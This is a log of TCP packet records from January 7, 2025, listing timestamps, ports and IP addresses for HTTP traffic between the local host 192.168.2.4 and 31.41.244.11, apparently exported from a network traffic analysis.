Jan 7, 2025 10:09:00.317703009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317723989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317735910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317744970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317747116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317774057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317876101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317890882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317903042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317914009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317923069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317924976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.317943096 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317961931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.317986012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.318000078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318011045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318017006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318046093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.318067074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.318198919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318250895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318252087 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.318262100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318300962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318311930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318330050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.318350077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.318423033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318434000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318443060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318469048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.318491936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.318742990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318783998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318793058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318835974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.318852901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.318882942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318893909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318903923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318914890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318932056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.318933964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318943977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318959951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318963051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.318973064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318984985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.318989038 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.318996906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319010973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.319029093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319041967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.319042921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319130898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319142103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319168091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.319194078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.319456100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319483042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319494963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319511890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319520950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319538116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.319555998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.319649935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319678068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319689989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319720030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.319736004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319737911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.319746971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319757938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319777966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.319787979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319796085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.319799900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319825888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.319856882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.319859982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319871902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319881916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.319912910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.319947958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.320060968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.320080042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.320106030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.320579052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.350450039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350465059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350513935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350523949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350534916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350548029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.350572109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.350577116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350588083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350598097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350608110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.350636005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.350662947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.350671053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350680113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350718975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.350748062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350794077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350804090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350833893 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.350846052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.350893974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350904942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.350936890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.350945950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.351011992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.351035118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.351044893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.351075888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.351099968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.351162910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.351174116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.351644039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.368801117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.368822098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.368839025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.368850946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.368860960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.368869066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.368901968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.368904114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.368917942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.368947983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.368978024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.368982077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.368993044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.369004011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.369025946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.369040966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.369066000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.369075060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.369090080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.369134903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403146029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403162956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403177977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403198004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403209925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403222084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403239965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403250933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403268099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403281927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403294086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403300047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403306961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403333902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403345108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403347969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403358936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403362036 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403419018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403424025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403424025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403430939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403443098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403456926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403495073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403495073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403495073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403508902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403521061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403590918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403641939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403654099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403671980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403702974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403743029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403753996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403774977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403784990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403795958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403815031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403815031 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403850079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403851032 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403862000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403878927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403896093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403904915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403909922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403920889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403940916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403973103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403975964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.403986931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.403997898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404009104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404053926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404067039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404078007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.404078007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.404124975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.404139996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404153109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404253960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.404290915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404300928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404311895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404325962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404337883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404372931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.404372931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.404386044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404398918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404406071 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.404412031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404422998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404500961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.404609919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404619932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404639959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404653072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404664040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404670000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.404685020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404696941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.404702902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404716969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404746056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.404746056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.404776096 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.404942989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.404994011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405004025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405065060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.405067921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405081034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405098915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405109882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405122042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405138016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.405154943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.405178070 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.405493975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405503988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405515909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405553102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405565023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405584097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405584097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.405584097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.405596018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405608892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405628920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.405673027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.405673981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405687094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405705929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405716896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405719042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.405730009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405747890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405754089 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.405761003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405774117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.405786037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.405801058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.405852079 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.406296968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406322002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406339884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406352043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406363964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406373978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406390905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.406394005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406405926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406416893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406430960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406440973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406445026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.406445026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.406455994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406466961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.406476021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406488895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406511068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.406519890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406532049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406543016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.406549931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.406568050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.406578064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.437131882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437144041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437155962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437192917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437206030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437256098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437268019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437278986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437297106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.437316895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437344074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.437371969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.437378883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437388897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437400103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437485933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437494993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437505007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.437506914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437522888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437544107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.437556028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.437582970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437638044 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.437743902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437755108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437766075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437818050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.437818050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.437829971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437841892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437851906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437868118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437877893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.437899113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.437899113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.437927961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.455574036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.455609083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.455621004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.455682993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.455693960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.455707073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.455717087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.455741882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.455773115 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.455773115 CET	50017	80	192.168.2.4	31.41.244.11
